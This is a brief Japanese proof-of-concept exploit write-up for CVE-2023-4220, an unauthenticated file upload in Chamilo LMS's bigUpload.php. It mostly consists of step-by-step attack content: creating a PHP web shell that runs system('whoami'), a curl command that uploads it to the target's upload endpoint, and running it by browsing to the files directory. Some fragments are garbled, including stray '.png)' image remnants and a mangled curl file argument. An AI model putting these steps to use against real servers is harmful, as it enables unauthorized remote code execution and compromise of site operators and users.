
CVE-2023-4220用の概念実証エクスプロイト:Chamilo LMSの未認証ファイルアップロード。ウェブシェル展開を介して保存型XSSとリモートコード実行を可能にします。
/main/inc/lib/javascript/bigupload/inc/bigUpload.php における大容量ファイルアップロード機能の制限なしファイルアップロードにより、Chamilo LMS <= v1.11.24 では、認証されていない攻撃者が保存型クロスサイトスクリプティング攻撃を実行し、Webシェルをアップロードしてリモートコード実行を取得できます。
/main/inc/lib/javascript/bigupload/inc/bigUpload.php による大容量ファイルアップロード機能により、Webルート内の /main/inc/lib/javascript/bigupload/files ディレクトリに任意のファイルをアップロードできます。
/main/inc/lib/javascript/bigupload/files ディレクトリが存在する場合、以下のように任意のファイルをアップロードできます。
悪意のあるphpファイルを作成する echo '<?php system("whoami"); ?>' > dollarboysushil.php
.png)
その後、以下のコマンドを実行してこのファイルをアップロードできます。
`$ curl -F '[email protected]' 'http://<website>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'`
.png)
ファイルがアップロードされたかは、/main/inc/lib/javascript/bigupload/files ディレクトリにアクセスして確認できます。
.png)
そして、phpファイルをクリックして実行すると、whoamiコマンドの出力が得られます。
.png)